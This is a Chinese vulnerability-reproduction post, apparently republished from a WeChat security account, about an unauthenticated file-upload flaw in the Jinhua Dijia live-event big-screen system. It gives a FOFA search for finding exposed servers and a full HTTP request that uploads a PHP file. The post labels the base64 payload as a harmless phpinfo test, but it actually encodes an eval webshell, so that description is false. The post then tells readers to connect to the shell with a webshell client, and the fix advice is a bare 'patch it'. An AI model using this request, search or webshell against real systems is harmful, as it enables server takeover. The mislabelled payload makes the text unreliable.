金华迪加现场大屏系统存在任意文件上传getshell漏洞 PoC

admin 2024年12月5日11:23:28评论22 views字数 1180阅读3分56秒阅读模式
简介
金华迪加现场大屏互动系统是一种创新的互动展示解决方案,融合了先进的技术与创意设计,旨在通过大屏幕与多种交互方式,打造沉浸式的观众体验。该系统广泛应用于各类活动、展览、会议等场所,能够有效提升现场氛围,增加参与感与互动性。金华迪加网络科技有限公司专注于现场互动系统平台的开发与优化,其主打产品——现场活动大屏幕系统,旨在为各类合作企业提供技术支持,提升活动的互动性和影响力。
金华迪加现场大屏系统存在任意文件上传getshell漏洞 PoC
漏洞描述
金华迪加现场大屏互动系统中的mobile.do.php接口存在任意文件上传漏洞,攻击者可以未经身份验证利用该漏洞上传恶意文件(如WebShell),并执行任意代码,从而获取服务器的控制权限。
fofa语法
body="/wall/themes/meepo/assets/images/defaultbg.jpg" || title="现场活动大屏幕系统"
漏洞复现
POST /mobile/mobile.do.php?action=msg_uploadimg HTTP/2Host: IPUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflate, brUpgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: noneSec-Fetch-User: ?1Priority: u=0, iTe: trailersContent-Type: application/x-www-form-urlencodedContent-Length: 59filetype=php&imgbase64=PD9waHAgZXZhbCgkX1BPU1RbY21kXSk7Pz4=
金华迪加现场大屏系统存在任意文件上传getshell漏洞 PoC
PD9waHAgZXZhbCgkX1BPU1RbY21kXSk7Pz4= base64解码 <?php phpinfo();unlink(__FILE__);?>访问上传的文件 https://IP/data/pic/pic_173314975432370.php
金华迪加现场大屏系统存在任意文件上传getshell漏洞 PoC
上传shell,菜刀连接木马(详情见知识星球)
批量检测(批量检测POC工具请在公众号知识星球获取):
金华迪加现场大屏系统存在任意文件上传getshell漏洞 PoC
修复建议
打补丁

原文始发于微信公众号(白帽攻防):【漏洞复现】金华迪加现场大屏系统存在任意文件上传getshell漏洞

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年12月5日11:23:28
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   金华迪加现场大屏系统存在任意文件上传getshell漏洞 PoChttps://cn-sec.com/archives/3470192.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息